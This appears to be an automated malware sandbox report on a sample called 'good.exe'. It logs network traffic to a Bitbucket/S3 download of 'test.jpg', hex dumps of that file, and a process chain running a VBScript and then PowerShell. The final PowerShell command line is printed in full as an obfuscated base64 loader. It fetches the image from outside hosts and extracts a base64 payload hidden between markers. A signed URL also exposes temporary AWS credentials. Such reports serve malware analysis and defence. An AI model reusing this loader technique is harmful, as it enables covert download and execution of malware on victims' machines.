                                                                                          Content-Security-Policy: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend. [TRUNCATED]
                                                                                          X-Usage-Quota-Remaining: 999035.462
                                                                                          X-Usage-Request-Cost: 980.10
                                                                                          X-Usage-User-Time: 0.020172
                                                                                          X-Usage-System-Time: 0.009231
                                                                                          X-Usage-Input-Ops: 0
                                                                                          X-Usage-Output-Ops: 0
                                                                                          Age: 0
                                                                                          X-Cache: MISS
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Xss-Protection: 1; mode=block
                                                                                          Atl-Traceid: 810b552fe51c46f28a2c2f9a344f92b7
                                                                                          Atl-Request-Id: 810b552f-e51c-46f2-8a2c-2f9a344f92b7
                                                                                          Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                          Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                          Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                          Server-Timing: atl-edge;dur=166,atl-edge-internal;dur=4,atl-edge-upstream;dur=164,atl-edge-pop;desc="aws-eu-central-1"
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.44973854.231.134.2414438112C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-20 14:49:12 UTC1219OUTGET /a613a3a7-960e-457b-ade9-adac2ded05f8/downloads/13e6a3ab-36e2-4926-afc8-122cd28abbda/test.jpg?response-content-disposition=attachment%3B%20filename%3D%22test.jpg%22&AWSAccessKeyId=ASIA6KOSE3BNBTKKJY5M&Signature=WrRRG%2FjNv0KYJyVNvKxc%2BY6fR%2B0%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEK%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIHqlgISaXQZNWVdHrtqHFQM1aKdCCC5wz47mj8NtMH%2BIAiBdtBjgyJZ6tj7uXWFGVxbXJfoLZTyvi2A7sXwcgSrL%2BSqwAgio%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMFJaKkm%2Baexgdux4uKoQC6KXHopDQ%2FlrvHmoVWqroq7CEf10111jAHgCJB1MtIiwoslQvWwr%2B0TjbV0drvIlTQrZSoCEisB3EKyeKiSOdy4cG7zLV8sUpkCTFObt0YVdcZihx5WCNnElUd6Q0GtOsyOJ54uKNitBk4qLGC%2F8FLxoWB8Zd7GFtIhjBH6oiR29zWtJHxVJMEzbEk0X8I6ra5TJTAxAmj%2FGBrJRWzhpL7djvH%2BWsC9IJL3xndZ130rjzzEn3Hy0dMH4Ffr76tlD%2FuZUeGrYyghPc8SyR5fqjbJHN3e9nSOiKDWOIXmDqOsRdlmX0FjNbG66IlTsda3suu%2BoRn1c7bGtYzOEXJO6jQojgYsEwsMC5vAY6ngHasjGz4hS4AfIgJXweXhdRz1bV7MycPu%2FtoygR37IQAI2SIbv%2BJt7FUa41kbstbCnTf83poZhHfI9%2FRbWfaSYmj1qK922%2BqxSm9MABVAMkZx5JZm3rwCcg5 [TRUNCATED]
                                                                                          Host: bbuseruploads.s3.amazonaws.com
                                                                                          Connection: Keep-Alive
                                                                                          2025-01-20 14:49:12 UTC524INHTTP/1.1 200 OK
                                                                                          x-amz-id-2: lj9larRJl8uKniQI0CbfGSGAebzGz3fN7qvuYEhjB1QEZXsGcp7ZexS05kzQeiHjN8iHnfzWfiI=
                                                                                          x-amz-request-id: K3TGRSCQXEEJRZPG
                                                                                          Date: Mon, 20 Jan 2025 14:49:13 GMT
                                                                                          Last-Modified: Fri, 17 Jan 2025 19:10:25 GMT
                                                                                          ETag: "30042fc109c67d40cdf5dd596e06bd73"
                                                                                          x-amz-server-side-encryption: AES256
                                                                                          x-amz-version-id: n0W6vcxraIiAeYkdm0AcSI9rBn_VJJXj
                                                                                          Content-Disposition: attachment; filename="test.jpg"
                                                                                          Accept-Ranges: bytes
                                                                                          Content-Type: image/jpeg
                                                                                          Content-Length: 1783795
                                                                                          Server: AmazonS3
                                                                                          Connection: close
                                                                                          2025-01-20 14:49:12 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 01 00 48 00 48 00 00 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64
                                                                                          Data Ascii: JFIFHHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@d
                                                                                          2025-01-20 14:49:12 UTC500INData Raw: 7d 3f 07 cb eb e9 e1 e3 cf d5 e5 71 dc eb c7 96 77 35 99 50 b6 52 8b 6e f1 d1 25 91 33 32 5e 9f d3 bf 9a ff 00 74 e3 9f e9 1e ee 1d fc 7d 82 a1 33 73 8d f3 cb 38 d4 5e 79 de 4e 59 e9 2c e1 e5 fa 1c 8f 8d f2 ff 00 4d e0 d3 f1 7f 9e fd df e4 fa df c7 7c 9f d0 fc 5f 4e 3e 77 46 f5 9f bf fb 7f c7 7e db 93 f5 1f 5f e5 7d 1f 33 d1 e3 e9 e4 ce be 5f c9 fb fb de bf 2b e1 fd d7 91 3f 9a fc 5f e8 ff 00 98 e8 fc a7 d4 e1 df bc fd 27 dd fc d7 e8 b9 67 db c7 d0 e7 7e 5f 6e fe 96 ba 7d ff 00 07 d8 cc f5 fa f8 7a 30 de b3 a9 68 00 a8 0a 20 0a 22 8c e7 59 ae 5e 3f 5f 93 33 e5 fe 7b f4 3f 9f de bf 2d f1 be bf e6 7d 13 ea fd 7f c6 7b fa f3 fd ef b3 f2 1e fe 5c fe ee 3e 4e a7 4f a7 ed f9 1f 56 5f a9 ec f1 fb b9 a7 87 e9 71 c6 bf 37 f0 7f 65 f2 35 7f 01 f9 df e8 9f 97 ed 3f
                                                                                          Data Ascii: }?qw5PRn%32^t}3s8^yNY,M|_N>wF~_}3_+?_'g~_n}z0h "Y^?_3{?-}{\>NOV_q7e5?
                                                                                          2025-01-20 14:49:12 UTC16384INData Raw: 4f 3f e5 3f 45 fc f7 5c bf 98 7c ff 00 99 cb db 3f 7d fb 1f e2 1f 57 8e bf b6 f2 fe 53 f7 73 3f 6f f6 7e 77 ed 7c fd fc 7f 4b d7 d2 39 ef 4d e6 14 94 00 00 00 00 47 8d 31 fe 71 fd af f1 9f 77 0c fb fc 1f 59 e8 fe bd fd 5f f0 ff 00 bc f9 7d f4 3b f9 d6 5d 4a 8a a0 a4 34 42 80 00 12 94 00 00 00 00 46 b3 ab 00 8a 19 b0 05 01 28 c6 3b 33 7c bc bd e9 7e 47 9b ef e7 3a fc d6 bf 44 cd f1 fb b5 ad e1 73 ad e0 2c 99 d9 7c dc bd ac 6b 9f 59 ab 12 cd 40 b0 29 2a 31 8e de 7c 6f 5b e3 d2 5e 97 97 5d e4 35 01 29 0a 09 c7 af 97 9e 9d fc 9d 39 6b d9 9c 74 ef 8f 0f e5 ff 00 63 f9 0e 3d 3f 8e 7c 0f e8 3f b0 eb 3f 8f 7c 2f f4 67 c6 c3 f9 77 f7 bf 8f fb 0f 37 4f 5f 49 af 6f 1d 23 79 00 50 00 00 01 2c 00 28 50 00 00 12 c0 00 00 00 52 50 00 00 00 14 00 00 00 00 54 94 a0 00 00
                                                                                          Data Ascii: O??E\|?}WSs?o~w|K9MG1qwY_};]J4BF(;3|~G:Ds,|kY@)*1|o[^]5)9ktc=?|??|/gw7O_Io#yP,(PRPT
                                                                                          2025-01-20 14:49:12 UTC1024INData Raw: f5 bf c6 3d fe 5f 14 5f 66 7a 7f 4d fc 87 f6 df 9f ef fa de 9c 6f c2 d2 78 75 cf f9 af f3 3f d7 fd 0f a3 cf 87 f5 ae ff 00 5b e6 7a f5 d3 9f 49 c7 5b e7 bd 66 eb 37 4d 5c dd 67 56 34 b7 36 ca 82 82 a0 10 d3 34 b2 11 2c 04 5a 94 04 58 16 0b 72 aa 96 16 29 62 a9 0a 2c a9 6a 8a b6 5a 4a 25 84 d2 55 00 80 b2 96 52 58 aa 28 00 09 60 28 00 16 0a 94 20 46 72 f8 ff 00 e7 2f f5 2f f2 fd e7 f8 2f eb ff 00 1f 3b eb fd 0d fa ef f2 97 ee bc 9d 3f d1 58 fe 35 a4 fe bf eb fe 57 fb fe 5b fa d3 3c bb 71 ed e7 fc e7 f2 5d 4f ea 1f ca 3f 1b fa 1e da f9 5f b5 fd 57 f4 1f 3f 5f 97 fa 4e 9a cf 22 ba 60 01 08 28 02 c1 60 ba 10 00 0a 20 14 25 08 b0 0a 14 2a 21 68 10 28 00 00 02 dc da 02 ca 00 00 00 12 c0 05 94 01 65 00 00 00 00 03 42 c0 20 00 58 28 00 00 00 00 00 00 00 0a 00 00
                                                                                          Data Ascii: =__fzMoxu?[zI[f7M\gV464,ZXr)b,jZJ%URX(`( Fr///;?X5W[<q]O?_W?_N"`(` %*!h(eB X(
                                                                                          2025-01-20 14:49:12 UTC16384INData Raw: 02 80 58 16 05 82 a0 b7 36 50 b2 a2 d0 8a 8a a4 2c a2 47 cd cb 3f 9c fc 8f f3 1d 6f fd 31 f8 ef e6 9f 66 e3 f9 bf 0f 55 f5 e3 c3 7a f2 af 47 d2 f8 9d 79 f6 fe 9d fd 5b fc bd f6 bc 7d 3f d0 5f cc bf 09 d3 d3 c7 c1 f3 7e c7 c7 ef cb bf fa 07 fc eb fb 5f 37 5f f4 e7 5f 8b f6 bc eb 4e b8 50 00 42 ca 19 d4 22 ca 55 16 54 00 05 94 00 01 02 89 50 6a 51 28 0b 00 0a 00 00 00 59 40 aa 94 00 00 00 4b 00 00 a0 59 40 00 00 00 00 d2 5b 00 8b 00 00 b0 2c 0a 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 42 b1 33 7a 7e 7f d3 f0 bc be bf c3 fe 3b fb 9f e2 fc fe cf e2 5c 3e cf c9 fa 7e 5e 7f ac fc 9f e8 f1 af ec 3f 9c fe d3 f9 5f 06 ff 00 8a 7c 3c fc df 75 f5 67 cf d3 7c bf ac fd 8f e3 bf 7f c5 d3 f1 dc 7d 98 f7 71 e5 fa ff 00 cd fa b1 af f4 2f ec ff 00 cc ff 00 e8 4e 5c
                                                                                          Data Ascii: X6P,G?o1fUzGy[}?_~_7__NPB"UTPjQ(Y@KY@[,(B3z~;\>~^?_|<ug|}q/N\
                                                                                          2025-01-20 14:49:12 UTC1024INData Raw: bf 99 fe 83 1d 7f 71 f1 3c ff 00 9a c5 fd 87 e7 7f 61 f1 3a 63 f9 3f 3f 57 97 ea fc dd 7d 4e 5f d7 7c de cf c0 fe a7 f7 7f 47 c3 e9 fc 47 97 fa 0e b0 fe 77 d7 fa 08 fc c7 d9 fa 7b c3 c7 ed b6 73 d5 ca 63 57 34 5c 8d dc 8d c2 96 13 57 28 d2 2b 49 62 dc da ba c8 b6 51 ac d4 d2 2c d5 c5 ab 96 63 1f 9f fb 5f 94 bd 3e cf d7 f8 7e fe 57 a7 e2 ba fe 0b d7 99 f5 f9 7f 43 d7 5e 9f a3 cf 7f 2f 1b 63 a7 3d 0b 00 a4 28 a0 b5 60 b7 35 16 22 8a 04 59 68 95 48 b3 48 5a 56 40 4a 00 8a a4 d4 89 68 96 43 52 42 c2 54 b2 54 48 44 cd 49 31 a4 99 97 59 99 ce b5 31 25 d4 c6 73 ad cc 65 7a ce 45 ea e4 8e da e1 53 bd e3 ab 3b 5e 3a ae ba e5 ad 67 a6 b9 6b 59 ed 79 eb 78 e9 71 ad e7 6c eb 72 eb 2d 67 56 35 34 96 aa 54 25 20 a0 8a 2a a0 a8 2a 5a 02 c2 ca 82 82 a0 b7 36 aa 16 ca 48
                                                                                          Data Ascii: q<a:c??W}N_|GGw{scW4\W(+IbQ,c_>~WC^/c=(`5"YhHHZV@JhCRBTTHDI1Y1%sezES;^:gkYyxqlr-gV54T% **Z6H
                                                                                          2025-01-20 14:49:12 UTC1749INData Raw: ae 79 ac dc cd 96 81 19 b1 25 8d fa 3c de 9c ef ec 7e 93 f2 df 6f cb ea fd 47 d3 fc f7 d5 f3 f5 fb 5e 9f 9b ed e5 bf 4d c5 cb 52 4b 66 58 26 52 bc 1f c9 7f 6f fc d3 df e2 c9 7d 3c 2f ed ff 00 25 fd 47 c7 eb fa 99 df 3f 27 ae 73 df 2b 99 cb 7c b5 26 19 d1 8b 94 db 25 eb be 3b cb 71 a8 c4 de 6e b3 36 4e 6e b2 39 5e b5 71 bd f4 cd cf 4b d2 31 f9 0f da fe 33 af 0f c8 f5 f1 e3 dd e5 fa be 9f 85 f6 39 76 fe c9 3a 7d 3f 99 ed fe 25 f9 9f e9 ff 00 8d fa 7e 1f d2 7f 58 fc f7 b7 e6 fb 3e f6 7f 21 f2 ef 0f dc 7d 0f e7 1f b8 e5 d7 e9 48 4d dc 53 6c 5b 36 ca 37 71 6c d5 c5 93 77 0a dd cd 2d ca 4d a5 a0 8d 21 35 73 4a 0b 73 aa b6 0b 62 aa 07 1e be 48 f9 3f 85 eb fc f3 d9 af ec fe 2f c5 f8 39 bd 5e ae 1f be df 4f 4f ea f1 ea f1 f2 ba cd df 3a 97 45 94 04 a9 6c 25 5a 10
                                                                                          Data Ascii: y%<~oG^MRKfX&Ro}</%G?'s+|&%;qn6Nn9^qK139v:}?%~X>!}HMSl[67qlw-M!5sJsbH?/9^OO:El%Z
                                                                                          2025-01-20 14:49:12 UTC9000INData Raw: bf 3d ef 9e fa e1 a8 e9 9b ac ea 85 b2 2a c0 a9 9d 4c df 37 97 db e4 f1 7a 3c 5f 2b ec 7c df 27 ab e2 f8 fe b7 9e 5f 93 f6 1e c6 3e af bb cb ee df 3e dd b9 f5 f7 f9 f5 73 ae dc ea 5a 01 28 8b 10 28 09 c3 d0 e7 af 9b f2 3f 49 e1 f1 fa 7f 39 f4 b8 e7 cf d7 ed 7a bc 5e ef 57 9f a2 eb d5 c7 37 4a 94 a8 a4 81 40 00 82 a0 a0 02 2c 12 82 0b 14 81 41 04 2a 0a 94 00 00 12 c3 38 d7 3e 5a cf 07 97 cd d6 7c ed fc bc ef 8f c4 ef f1 3b 4e 7e 6e 9e 9e c9 f7 a7 de e3 ae df 5b 87 bb 8e 7a f4 6f a7 3c cd e7 53 0b 26 a2 59 6a 52 eb 1a d6 7a 5c dd e5 2e 53 3c 7a f0 e5 bf 3f 83 dd f3 da f0 78 bd 7e 4e 95 df 87 a4 f6 fb 7c 9e cc cf 57 a7 87 79 9e bb c6 f7 2e a5 de 6c aa ce 75 9c b3 9d 63 1a c4 b9 97 39 d6 66 a4 ad 49 29 16 51 d3 3a 35 66 91 66 95 ac e9 9b 34 b3 0d c3 2d a3 13
                                                                                          Data Ascii: =*L7z<_+|'_>>sZ((?I9z^W7J@,A*8>Z|;N~n[zo<S&YjRz\.S<z?x~N|Wy.luc9fI)Q:5ff4-
                                                                                          2025-01-20 14:49:12 UTC16384INData Raw: fe 97 f3 3f a5 f2 7b 7f a0 fe 8f e3 fd 9f 9d eb 24 d6 34 c2 ba 33 65 b0 55 82 a5 34 cd 17 23 6c ea 35 73 4d dc dc cd 5c d3 56 23 6c e8 d6 b3 a9 2d cd 06 47 39 f3 a4 e5 fc ef db f8 cf 76 2f e9 3c 5f d0 67 6f 77 dc ce bc 33 c9 fc cf f5 5f c8 be 87 9b cd 3c 1a fa 1e 4f d1 7d 8f c7 fd 1e 1d ba fc ae 9f 3b a6 7e bf e8 ff 00 11 f5 b1 bf ef df 73 f9 cf ef 7e 27 b7 d9 78 6f 38 e9 73 75 35 73 4a 82 dc 8b 64 2d c8 a8 2d c8 d3 28 d4 8a d5 c5 35 71 53 57 15 35 73 6b 6c dd 67 4c da b6 12 d8 2d 8b 35 21 44 09 22 e6 e6 69 9d 67 37 8f 9b d9 c7 3d 3c 5c 3d bc a7 4f 99 f3 fe df 97 5b fc df cd fd 67 cb e8 fc b4 fa ff 00 3f ae 2f d1 f8 bd b3 3f 4d af cd 7a b9 5f d0 5f 07 af 37 5c b7 cb 57 8f 9b d1 e7 d3 cd e5 f4 f9 f7 7c 9e 5f 5f 97 ae 7c 9e 6f 5f 9f a6 78 63 af 2e 99 e9 db
                                                                                          Data Ascii: ?{$43eU4#l5sM\V#l-G9v/<_gow3_<O};~s~'xo8su5sJd--(5qSW5sklgL-5!D"ig7=<\=O[g?/?Mz__7\W|__|o_xc.
                                                                                          2025-01-20 14:49:12 UTC1024INData Raw: 83 58 f7 7b fe 77 bb 9f 4f a3 bf 0f 4e 7b f4 f5 f2 fa f0 e9 5b 97 9b 55 79 5e fa 3e 77 c7 fb bf 27 af 0f 85 e4 fa 1e 3f 4f 9f cb cf b7 1e 9c dd 71 ec 9b eb ee e7 eb e3 e9 eb ec de b8 75 f9 9f 0f ee fc 5e de 6f 37 ab 1d 7a 4f a3 8f 9f e7 c6 bd 7c ef bb 5a f0 76 fb 1e fe 5d fe 27 6f bb ee e5 db e2 7b bf 43 ee e3 bf cd 7a ff 00 49 df 0f 83 eb fa da c5 f0 7a 3d 2c e7 1b d5 8c 5d 53 37 76 25 d2 44 d0 cd d2 31 75 a3 16 d3 3a d5 89 ab 52 69 49 6e 92 55 15 6c cf 2e dc a6 bc 5f 1f eb fc 57 7f ca 7e 57 f4 df 92 fa 19 e5 3c fa f5 78 7d 3f 4b e5 fd 6e 5d ff 00 43 fa af ce fe ab e6 fb 3e b7 d2 f1 7d 0e 3e 4e db c6 bb f9 ad 8d 4d 25 80 16 19 d3 35 34 82 d8 ad 6b 15 9d 20 ac d8 a2 9a cd b2 84 a9 50 11 60 d4 0a 97 53 57 3a b2 a5 dc b7 36 e7 49 77 34 96 ac ad e4 96 b4 97
                                                                                          Data Ascii: X{wON{[Uy^>w'?Oqu^o7zO|Zv]'o{CzIz=,]S7v%D1u:RiInUl._W~W<x}?Kn]C>}>NM%54k P`SW:6Iw4


                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:0
                                                                                          Start time:09:48:46
                                                                                          Start date:20/01/2025
                                                                                          Path:C:\Users\user\Desktop\good.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\user\Desktop\good.exe"
                                                                                          Imagebase:0x7ff731910000
                                                                                          File size:164'352 bytes
                                                                                          MD5 hash:1F060BE9FBFE90811A71414791AB8C1B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:1
                                                                                          Start time:09:48:46
                                                                                          Start date:20/01/2025
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c fwr.vbs
                                                                                          Imagebase:0x7ff60f2b0000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:2
                                                                                          Start time:09:48:46
                                                                                          Start date:20/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:3
                                                                                          Start time:09:48:46
                                                                                          Start date:20/01/2025
                                                                                          Path:C:\Windows\System32\wscript.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs"
                                                                                          Imagebase:0x7ff789530000
                                                                                          File size:170'496 bytes
                                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:4
                                                                                          Start time:09:48:59
                                                                                          Start date:20/01/2025
                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
                                                                                          Imagebase:0x7ff63b0e0000
                                                                                          File size:71'680 bytes
                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:6
                                                                                          Start time:09:49:06
                                                                                          Start date:20/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@1@DE@Nw@2@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bg